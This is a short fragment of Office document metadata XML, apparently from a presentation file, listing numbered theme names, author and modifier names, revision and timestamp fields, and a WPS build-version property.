      <vt:lpstr>41_Office 主题</vt:lpstr>
      <vt:lpstr>42_Office 主题</vt:lpstr>
      <vt:lpstr>43_Office 主题</vt:lpstr>
      <vt:lpstr>44_Office 主题</vt:lpstr>
      <vt:lpstr>45_Office 主题</vt:lpstr>
      <vt:lpstr>46_Office 主题</vt:lpstr>
      <vt:lpstr>47_Office 主题</vt:lpstr>
      <vt:lpstr>48_Office 主题</vt:lpstr>
      <vt:lpstr>49_Office 主题</vt:lpstr>
      <vt:lpstr>50_Office 主题</vt:lpstr>
      <vt:lpstr>51_Office 主题</vt:lpstr>
      <vt:lpstr>52_Office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Liping</dc:creator>
  <cp:lastModifiedBy>Fangtian Zhong</cp:lastModifiedBy>
  <cp:revision>145</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-25T09:27:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-25T09:27:16Z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A1378116E481472FA6251A948E06C9AB_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-4.9.0.7859</vt:lpwstr>
  </property>
</Properties>
</file>